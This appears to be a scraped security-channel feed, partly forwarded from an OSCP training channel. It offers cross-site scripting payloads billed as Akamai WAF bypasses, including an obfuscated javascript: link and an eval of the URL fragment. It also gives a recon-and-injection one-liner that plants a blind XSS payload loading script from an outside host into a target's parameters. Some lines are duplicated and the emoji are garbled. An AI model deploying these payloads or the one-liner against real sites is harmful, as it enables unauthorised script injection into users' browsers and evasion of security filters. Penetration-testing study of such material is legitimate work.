Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
๐4๐1
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
PortSwigger Research
Turbo Intruder: Embracing the billion-request attack
Automated web application attacks are terminally limited by the number of HTTP requests they can send. It's impossible to know how many hacks have gone off the rails because you didn't quite manage to
๐1
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Testing Authentication Flaws in Web Application
๐1